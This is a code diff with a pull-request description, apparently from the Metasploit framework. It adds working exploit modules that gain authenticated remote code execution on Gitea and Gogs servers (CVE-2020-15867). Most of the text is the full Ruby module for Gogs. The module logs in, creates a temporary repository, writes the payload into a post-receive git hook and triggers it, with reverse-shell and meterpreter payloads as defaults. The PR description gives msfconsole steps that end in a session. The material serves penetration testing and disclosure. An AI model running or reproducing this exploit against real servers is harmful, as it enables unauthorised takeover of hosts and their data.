+      cookie_jar.clear
+      cookie_jar.merge(cookie_jar_updated)
+    end
+
+    res
+  end
+
+  def cookie_jar_to_hash(jar = cookie_jar)
+    jar.each_with_object({}) do |cookie, cookie_hash|
+      name, value = cookie.split('=')
+      cookie_hash[name] = value
+    end
+  end
+
+  def cleanup
+    super
+    return unless @need_cleanup
+
+    print_status('Cleaning up')
+    uri = normalize_uri(datastore['USERNAME'], @repo_name, '/settings')
+    res = http_post_request(uri, action: 'delete', repo_name: @repo_name)
+
+    unless res
+      fail_with(Failure::Unreachable, 'Unable to reach the settings page')
+    end
+
+    unless res.code == 302
+      fail_with(Failure::UnexpectedReply, 'Delete repository failure')
+    end
+
+    print_status("Repository #{@repo_name} deleted.")
+
+    nil
+  end
+end

--- a/modules/exploits/multi/http/gitea_git_hooks_rce.rb
+++ b/modules/exploits/multi/http/gitea_git_hooks_rce.rb
@@ -111,6 +111,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
+      Opt::RPORT(3000),
       OptString.new('TARGETURI', [true, 'Base path', '/']),
       OptString.new('USERNAME', [true, 'Username to authenticate with']),
       OptString.new('PASSWORD', [true, 'Password to use']),
@@ -173,11 +174,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_good('Git hook setup')
 
     print_status('Create a dummy file on the repo to trigger the payload')
-    last_chunk = if cmd_list
-                   cmd == cmd_list.last
-                 else
-                   true
-                 end
+    last_chunk = cmd_list ? cmd == cmd_list.last : true
     gitea_create_file(last_chunk: last_chunk)
     print_good("File created#{', shell incoming...' if last_chunk}")
   end

--- a/modules/exploits/multi/http/gogs_git_hooks_rce.rb
+++ b/modules/exploits/multi/http/gogs_git_hooks_rce.rb
@@ -109,6 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
+      Opt::RPORT(3000),
       OptString.new('TARGETURI', [true, 'Base path', '/']),
       OptString.new('USERNAME', [true, 'Username to authenticate with']),
       OptString.new('PASSWORD', [true, 'Password to use']),
@@ -163,11 +164,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_good('Git hook setup')
 
     print_status('Create a dummy file on the repo to trigger the payload')
-    last_chunk = if cmd_list
-                   cmd == cmd_list.last
-                 else
-                   true
-                 end
+    last_chunk = cmd_list ? cmd == cmd_list.last : true
     gogs_create_file(last_chunk: last_chunk)
     print_good("File created#{', shell incoming...' if last_chunk}")
   end

--- a/modules/exploits/multi/http/gogs_git_hooks_rce.rb
+++ b/modules/exploits/multi/http/gogs_git_hooks_rce.rb
@@ -1,0 +1,374 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Gogs Git Hooks Remote Code Execution',
+        'Description' => %q{
+          This module leverages an insecure setting to get remote code
+          execution on the target OS in the context of the user running Gogs.
+          This is possible when the current user is allowed to create `git
+          hooks`, which is the default for administrative users. For
+          non-administrative users, the permission needs to be specifically
+          granted by an administrator.
+
+          To achieve code execution, the module authenticates to the Gogs web
+          interface, creates a temporary repository, sets a `post-receive` git
+          hook with the payload and creates a dummy file in the repository.
+          This last action will trigger the git hook and execute the payload.
+          Everything is done through the web interface.
+
+          No mitigation has been implemented so far (latest stable version is
+          0.12.3).
+
+          This module has been tested successfully against version 0.12.3 on
+          docker. Windows version could not be tested since the git hook feature
+          seems to be broken.
+        },
+        'Author' => [
+          'Podalirius',             # Original PoC
+          'Christophe De La Fuente' # MSF Module
+        ],
+        'References' => [
+          ['CVE', '2020-15867'],
+          ['EDB', '49571'],
+          ['URL', 'https://podalirius.net/articles/exploiting-cve-2020-14144-gitea-authenticated-remote-code-execution/'],
+          ['URL', 'https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1126-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/']
+        ],
+        'DisclosureDate' => '2020-10-07',
+        'License' => MSF_LICENSE,
+        'Platform' => %w[unix linux win],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => {
+                'CMDSTAGER::FLAVOR' => :bourne,
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Dropper',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :win_dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+        ],
+        'DefaultOptions' => { 'WfsDelay' => 30 },
+        'DefaultTarget' => 1,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('USERNAME', [true, 'Username to authenticate with']),
+      OptString.new('PASSWORD', [true, 'Password to use']),
+    ])
+
+    @need_cleanup = false
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    )
+    unless res
+      return CheckCode::Unknown('Target did not respond to check.')
+    end
+
+    # <meta name="author" content="Gogs" />
+    unless res.body.match(%r{<meta +name="author" +content="Gogs" */>})
+      return CheckCode::Unsupported('Target does not appear to be running Gogs.')
+    end
+
+    CheckCode::Appears('Gogs found')
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+
+    print_status("Authenticate with \"#{datastore['USERNAME']}/#{datastore['PASSWORD']}\"")
+    gogs_login
+    print_good('Logged in')
+
+    @repo_name = [Faker::App.name, Faker::App.name].join('_').gsub(' ', '_')
+    print_status("Create repository \"#{@repo_name}\"")
+    gogs_create_repo
+    @need_cleanup = true
+    print_good('Repository created')
+
+    case target['Type']
+    when :unix_cmd, :win_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper, :win_dropper
+      execute_cmdstager(background: true, delay: 1)
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    vprint_status("Executing command: #{cmd}")
+
+    print_status('Setup post-receive hook with command')
+    gogs_post_receive_hook(cmd)
+    print_good('Git hook setup')
+
+    print_status('Create a dummy file on the repo to trigger the payload')
+    last_chunk = if cmd_list
+                   cmd == cmd_list.last
+                 else
+                   true
+                 end
+    gogs_create_file(last_chunk: last_chunk)
+    print_good("File created#{', shell incoming...' if last_chunk}")
+  end
+
+  def http_post_request(uri, opts = {})
+    csrf = opts.delete(:csrf) || get_csrf(uri)
+    timeout = opts.delete(:timeout) || 20
+
+    post_data = { _csrf: csrf }.merge(opts)
+    request_hash = {
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], uri),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => post_data
+    }
+
+    send_request_cgi(request_hash, timeout)
+  end
+
+  def get_csrf(uri)
+    vprint_status('Get "csrf" value')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(uri)
+    )
+    unless res
+      fail_with(Failure::Unreachable, 'Unable to get the CSRF token')
+    end
+
+    csrf = extract_value(res, '_csrf')
+    vprint_good("csrf=#{csrf}")
+    csrf
+  end
+
+  def extract_value(res, attr)
+    # <input type="hidden" name="_csrf" value="Ix7E3_U_lOt-kZfeMjEll57hZuU6MTYxNzAyMzQwOTEzMjU1MDUwMA">
+    # <input type="hidden" id="user_id" name="user_id" value="1" required>
+    # <input type="hidden" name="last_commit" value="6a7eb84e9a8e4e76a93ea3aec67b2f70fe2518d2">
+    unless (match = res.body.match(/<input .*name="#{attr}" +value="(?<value>[^"]+)".*>/))
+      return fail_with(Failure::NotFound, "\"#{attr}\" not found in response")
+    end
+
+    return match[:value]
+  end
+
+  def gogs_login
+    res = http_post_request(
+      '/user/login',
+      user_name: datastore['USERNAME'],
+      password: datastore['PASSWORD']
+    )
+    unless res
+      fail_with(Failure::Unreachable, 'Unable to reach the login page')
+    end
+
+    unless res.code == 302
+      fail_with(Failure::NoAccess, 'Login failed')
+    end
+
+    nil
+  end
+
+  def gogs_create_repo
+    uri = normalize_uri(datastore['TARGETURI'], '/repo/create')
+
+    res = send_request_cgi('method' => 'GET', 'uri' => uri)
+    unless res
+      fail_with(Failure::Unreachable, "Unable to reach #{uri}")
+    end
+
+    vprint_status('Get "csrf" and "user_id" values')
+    csrf = extract_value(res, '_csrf')
+    vprint_good("csrf=#{csrf}")
+    user_id = extract_value(res, 'user_id')
+    vprint_good("user_id=#{user_id}")
+
+    res = http_post_request(
+      uri,
+      user_id: user_id,
+      repo_name: @repo_name,
+      private: 'on',
+      description: '',
+      gitignores: '',
+      license: '',
+      readme: 'Default',
+      auto_init: 'on',
+      csrf: csrf
+    )
+    unless res
+      fail_with(Failure::Unreachable, "Unable to reach #{uri}")
+    end
+
+    unless res.code == 302
+      fail_with(Failure::UnexpectedReply, 'Create repository failure')
+    end
+
+    nil
+  end
+
+  def gogs_post_receive_hook(cmd)
+    uri = normalize_uri(datastore['USERNAME'], @repo_name, '/settings/hooks/git/post-receive')
+    shell = <<~SHELL
+      #!/bin/bash
+      #{cmd}&
+      exit 0
+    SHELL
+
+    res = http_post_request(uri, content: shell)
+    unless res
+      fail_with(Failure::Unreachable, "Unable to reach #{uri}")
+    end
+
+    unless res.code == 302
+      msg = 'Post-receive hook creation failure'
+      if res.code == 404
+        msg << ' (user is probably not allowed to create Git Hooks)'
+      end
+      fail_with(Failure::UnexpectedReply, msg)
+    end
+
+    nil
+  end
+
+  def gogs_create_file(last_chunk: false)
+    uri = normalize_uri(datastore['USERNAME'], @repo_name, '/_new/master')
+    filename = "#{Rex::Text.rand_text_alpha(4..8)}.txt"
+
+    res = send_request_cgi('method' => 'GET', 'uri' => uri)
+    unless res
+      fail_with(Failure::Unreachable, "Unable to reach #{uri}")
+    end
+
+    vprint_status('Get "csrf" and "last_commit" values')
+    csrf = extract_value(res, '_csrf')
+    vprint_good("csrf=#{csrf}")
+    last_commit = extract_value(res, 'last_commit')
+    vprint_good("last_commit=#{last_commit}")
+
+    http_post_request(
+      uri,
+      last_commit: last_commit,
+      tree_path: filename,
+      content: Rex::Text.rand_text_alpha(1..20),
+      commit_summary: '',
+      commit_message: '',
+      commit_choice: 'direct',
+      csrf: csrf,
+      timeout: last_chunk ? 0 : 20 # The last one never returns, don't bother waiting
+    )
+    vprint_status("#{filename} created")
+
+    nil
+  end
+
+  # Hook the HTTP client method to add specific cookie management logic
+  def send_request_cgi(opts, timeout = 20)
+    res = super
+
+    return unless res
+
+    # HTTP client does not handle cookies with the same name correctly. It adds
+    # them instead of substituing the old value with the new one.
+    unless res.get_cookies.empty?
+      cookie_jar_hash = cookie_jar_to_hash
+      cookies_from_response = cookie_jar_to_hash(res.get_cookies.split(' '))
+      cookie_jar_hash.merge!(cookies_from_response)
+      cookie_jar_updated = cookie_jar_hash.each_with_object(Set.new) do |cookie, set|
+        set << "#{cookie[0]}=#{cookie[1]}"
+      end
+      cookie_jar.clear
+      cookie_jar.merge(cookie_jar_updated)
+    end
+
+    res
+  end
+
+  def cookie_jar_to_hash(jar = cookie_jar)
+    jar.each_with_object({}) do |cookie, cookie_hash|
+      name, value = cookie.split('=')
+      cookie_hash[name] = value
+    end
+  end
+
+  def cleanup
+    super
+    return unless @need_cleanup
+
+    print_status('Cleaning up')
+    uri = normalize_uri(datastore['USERNAME'], @repo_name, '/settings')
+    res = http_post_request(uri, action: 'delete', repo_name: @repo_name)
+
+    unless res
+      fail_with(Failure::Unreachable, 'Unable to reach the settings page')
+    end
+
+    unless res.code == 302
+      fail_with(Failure::UnexpectedReply, 'Delete repository failure')
+    end
+
+    print_status("Repository #{@repo_name} deleted.")
+
+    nil
+  end
+end


### PR DESCRIPTION
This adds 2 exploit modules for Gitea and Gogs self-hosted Git services. I added them both to a single PR since they are very similar (Gitea is a fork of Gogs) and, if anything needs to be updated after code review, it is very likely this would have to be done for both modules identically.

Both modules leverages an insecure setting to get remote code execution on the target OS in the context of the user running the application. This is possible when the current user is allowed to create `git hooks`, which is the default for administrative users. For non-administrative users, the permission needs to be specifically granted by an administrator.

To achieve code execution, the module authenticates to the web interface, creates a temporary repository, sets a `post-receive` git hook with the payload and creates a dummy file in the repository. This last action will trigger the
git hook and execute the payload. Everything is done through the web interface.

It has been mitigated in Gitea version 1.13.0 by setting the `DISABLE_GIT_HOOKS` configuration setting to `true` by default. This disables this feature and prevents all users (including admin) from creating custom git hooks. However, no mitigation has been implemented in Gogs so far (latest stable version is 0.12.3).

This has been tested successfully against Gitea Docker versions 1.12.5, 1.12.6 and 1.13.6 with `DISABLE_GIT_HOOKS` set to `false`, and on Gitea version 1.12.6 on Windows.
Also, this has been tested successfully against Gogs version 0.12.3 on Docker. Windows version could not be tested since the git hook feature seems to be broken.

### Setup

#### Gitea
Follow the installation steps:
- With Docker: https://docs.gitea.io/en-us/install-with-docker/
- From binary: https://docs.gitea.io/en-us/install-from-binary/
- From package: https://docs.gitea.io/en-us/install-from-package/

#### Gogs
Follow the installation steps:
- With Docker: https://github.com/gogs/gogs/tree/main/docker
- From binary: https://gogs.io/docs/installation/install_from_binary
- From package: https://gogs.io/docs/installation/install_from_packages

## Verification

### Gitea

- [ ] Install the application (follow [Setup](#setup))
- [ ] Start `msfconsole`
- [ ] Do: `use multi/http/gitea_git_hooks_rce`
- [ ] Do: `set USERNAME <username>`
- [ ] Do: `set PASSWORD <password>`
- [ ] Do: `set rhosts <ip>`
- [ ] Do: `set rport <port>`
- [ ] Do: `set lhost <ip>`
- [ ] Do: `set target <target #>`
- [ ] Do: `run`
- [ ] You should get session.

### Gogs

- [ ] Install the application (follow [Setup](#setup))
- [ ] Start `msfconsole`
- [ ] Do: `use multi/http/gogs_git_hooks_rce`
- [ ] Do: `set USERNAME <username>`
- [ ] Do: `set PASSWORD <password>`
- [ ] Do: `set rhosts <ip>`
- [ ] Do: `set rport <port>`
- [ ] Do: `set lhost <ip>`
- [ ] Do: `set target <target #>`
- [ ] Do: `run`
- [ ] You should get session.
